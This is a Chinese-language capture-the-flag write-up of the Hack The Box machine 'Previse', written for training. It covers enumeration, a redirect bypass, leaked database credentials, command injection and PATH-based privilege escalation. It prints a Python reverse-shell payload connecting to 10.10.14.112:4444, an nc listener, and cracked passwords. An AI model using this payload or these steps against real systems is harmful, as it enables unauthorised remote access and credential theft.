HTB靶机:Previse

image-20210829195313146

一个比较简单的靶机,整个过程很常规。整体思路很清晰的那种靶机。

获取用户权限

扫描端口

rustscan -a 10.,10.11.104

image-20230321131123792

发现开放22,80端口

我们访问该网站,发现是个登录框,在进行注入测试后发现行不通。

爆破目录

gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

image-20210829200453256

对扫描到的网站进行访问,发现出现302的会跳转到index.php页面,其中一个nav.php引起注意。

image-20210829200738870

访问其中的accounts.php页面时出现302,我们使用burp进行抓包修改。

image-20210829201357702

将抓到的包状态码由302改为200,然后放包。即可阻止跳转。

image-20210829201446798

image-20210829202743707

注册成功后,就能在登录页面进行登录,登录进去查看页面,发现一个压缩包。
在flies标签下可以上传文件,但不能利用。

image-20210829203211187

下载下来,解压缩后发现一些重要的配置文件:logs.php、config.php

image-20210829203548624

image-20210829203634303

通过两个文件我们可以知道该靶机的数据库账号和密码:root**/**mySQL_p@ssw0rd!:)
该靶机是python网站,看情况可以进行命令注入。测试网站的注入接口。发现此处进行抓包时可以注入命令。

image-20210829204427191

image-20210829204649807

此处添加“;”截断后添加:

python3 + -c
+'import+os,pty,socket;s=socket.socket()%3bs.connect(("10.10.14.112",4444)) ;[os.dup2(s.fileno(),f)for+f+in(0,1,2)];pty.spawn("/bin/bash")'

image-20210829205325692

同时使用nc命令进行监听。获取shell.
nc -lvp 4444

image-20210829205507929

进行查看一番后,没有发现可以利用的漏洞,尝试进行连接数据库。
mysql -u root -p
使用之前收集到的账号密码进行登录。查询数据库发现疑似主机账户:m4lwhere和密码hash.

image-20210829210552167

使用john进行密码爆破,先将密码保存到本地:hash
john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash
爆破到密码是:ilovecody112235!

image-20210829221428421

使用ssh连接主机

ssh m4lwhere@10.10.11.104

获取到用户flag

image-20210829220207221

提权

查看配置
sudo -l

image-20210829220419958

查看/opt/scripts/access_backup.sh,利用gzip路径滥用构建payload

搜索资料可知存在路径注入,进入到tmp目录

image-20210829222534223

参考

https://lunamoore.github.io/2021/08/16/HTB-Previse/#more

image-20210829222620805

反弹shell,获取rott权限。

总结:

这个靶机很常规,主要考验了对于配置的漏洞利用。
image-20210829144753002